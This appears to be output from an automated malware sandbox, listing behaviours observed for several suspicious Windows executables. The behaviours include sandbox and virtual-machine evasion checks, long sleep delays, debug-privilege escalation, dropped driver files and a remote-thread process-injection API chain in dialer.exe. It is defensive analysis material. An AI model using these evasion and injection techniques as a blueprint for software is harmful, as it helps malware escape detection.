Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Contains functionality to compare user and computer (likely to detect sandboxes)

Source: C:\Windows\System32\dialer.exe

Code function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,

51_2_00000001400010C0

Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Memory allocated: 1730000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Memory allocated: 1B120000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Memory allocated: BE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Memory allocated: 1A6C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Memory allocated: BD0000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Memory allocated: 1A7A0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6386	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6371	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Window / User API: threadDelayed 7571	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Window / User API: threadDelayed 496	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8929
Source: C:\Windows\System32\winlogon.exe	Window / User API: threadDelayed 9998
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8268
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 481

Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Dropped PE file which has not been started: C:\Program Files\Cuis\bon\Bara.exe	Jump to dropped file
Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe	Dropped PE file which has not been started: C:\Windows\Temp\dsarrsulkovb.sys	Jump to dropped file
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\FA9.tmp	Jump to dropped file

Source: C:\Windows\System32\conhost.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\sc.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep

Source: C:\Windows\System32\dialer.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe	API coverage: 7.3 %
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	API coverage: 7.4 %
Source: C:\Windows\System32\conhost.exe	API coverage: 4.9 %
Source: C:\Windows\System32\sc.exe	API coverage: 6.1 %
Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe	API coverage: 2.6 %
Source: C:\Windows\System32\conhost.exe	API coverage: 4.9 %

Source: C:\Users\user\Desktop\F4R5fd8grr.exe TID: 7660	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7728	Thread sleep count: 6386 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7732	Thread sleep count: 281 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7848	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7828	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7724	Thread sleep count: 6371 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7736	Thread sleep count: 124 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7852	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7824	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe TID: 3636	Thread sleep time: -24903104499507879s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe TID: 2836	Thread sleep count: 7571 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe TID: 7348	Thread sleep count: 496 > 30	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe TID: 8048	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2588	Thread sleep count: 8929 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7608	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7024	Thread sleep count: 81 > 30
Source: C:\Windows\System32\dialer.exe TID: 7632	Thread sleep count: 163 > 30
Source: C:\Windows\System32\dialer.exe TID: 7020	Thread sleep count: 161 > 30
Source: C:\Windows\System32\winlogon.exe TID: 7460	Thread sleep count: 9998 > 30
Source: C:\Windows\System32\winlogon.exe TID: 7460	Thread sleep time: -9998000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7192	Thread sleep count: 8268 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7732	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7876	Thread sleep count: 481 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7820	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Code function: 0_2_00007FF731C9B110 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	0_2_00007FF731C9B110
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Code function: 0_2_00007FF731C8407C FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	0_2_00007FF731C8407C
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Code function: 0_2_00007FF731CAFC20 FindFirstFileExA,	0_2_00007FF731CAFC20
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Code function: 2_2_000001B63116DCE0 FindFirstFileExW,	2_2_000001B63116DCE0
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Code function: 10_2_1B88DCE0 FindFirstFileExW,	10_2_1B88DCE0
Source: C:\Windows\System32\conhost.exe	Code function: 22_2_000001C25C77DCE0 FindFirstFileExW,	22_2_000001C25C77DCE0
Source: C:\Windows\System32\sc.exe	Code function: 63_2_0000017CD5ACDCE0 FindFirstFileExW,	63_2_0000017CD5ACDCE0
Source: C:\Windows\System32\sc.exe	Code function: 63_2_0000017CD5B2D604 FindFirstFileExW,	63_2_0000017CD5B2D604
Source: C:\Windows\System32\sc.exe	Code function: 63_2_0000017CD5B8DCE0 FindFirstFileExW,	63_2_0000017CD5B8DCE0
Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe	Code function: 66_2_0000023E07F4DCE0 FindFirstFileExW,	66_2_0000023E07F4DCE0
Source: C:\Windows\System32\conhost.exe	Code function: 68_2_000001A645EEDCE0 FindFirstFileExW,	68_2_000001A645EEDCE0

Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe

Code function: 0_2_00007FF731CA1624 VirtualQuery,GetSystemInfo,

0_2_00007FF731CA1624

Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: Client.exe, 0000000A.00000002.1867133794.000000001B154000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\dialer.exe

API call chain: ExitProcess graph end node

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe

Code function: 0_2_00007FF731CA7658 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00007FF731CA7658

Source: C:\Users\user\Desktop\GR55Qg1hth.exe

Code function: 2_2_00007FF650236CA0 GetLastError,FormatMessageA,IsDebuggerPresent,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,LocalFree,

2_2_00007FF650236CA0

Source: C:\Users\user\Desktop\GR55Qg1hth.exe

Code function: 2_2_00007FF650241B90 GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,

2_2_00007FF650241B90

Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe

Code function: 0_2_00007FF731CB0CA0 GetProcessHeap,

0_2_00007FF731CB0CA0

Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\dialer.exe	Process token adjusted: Debug
Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Code function: 0_2_00007FF731CA32D4 SetUnhandledExceptionFilter,	0_2_00007FF731CA32D4
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Code function: 0_2_00007FF731CA2490 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF731CA2490
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Code function: 0_2_00007FF731CA7658 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF731CA7658
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Code function: 0_2_00007FF731CA30F0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF731CA30F0
Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe	Code function: 1_2_00007FF6880C118B Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,	1_2_00007FF6880C118B
Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe	Code function: 1_2_00007FF6880C11D8 _initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,	1_2_00007FF6880C11D8
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Code function: 2_2_000001B63116D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_000001B63116D2A4
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Code function: 2_2_000001B631167D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_000001B631167D90
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Code function: 2_2_00007FF650221190 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,malloc,memcpy,_initterm,GetStartupInfoW,	2_2_00007FF650221190
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Code function: 2_2_00007FF650239E11 SetUnhandledExceptionFilter,	2_2_00007FF650239E11
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Code function: 2_2_00007FF650480660 SetUnhandledExceptionFilter,	2_2_00007FF650480660
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Code function: 10_2_1B88D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_1B88D2A4
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Code function: 10_2_1B887D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_1B887D90
Source: C:\Windows\System32\conhost.exe	Code function: 22_2_000001C25C777D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	22_2_000001C25C777D90
Source: C:\Windows\System32\conhost.exe	Code function: 22_2_000001C25C77D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	22_2_000001C25C77D2A4
Source: C:\Windows\System32\sc.exe	Code function: 63_2_0000017CD5ACD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	63_2_0000017CD5ACD2A4
Source: C:\Windows\System32\sc.exe	Code function: 63_2_0000017CD5AC7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	63_2_0000017CD5AC7D90
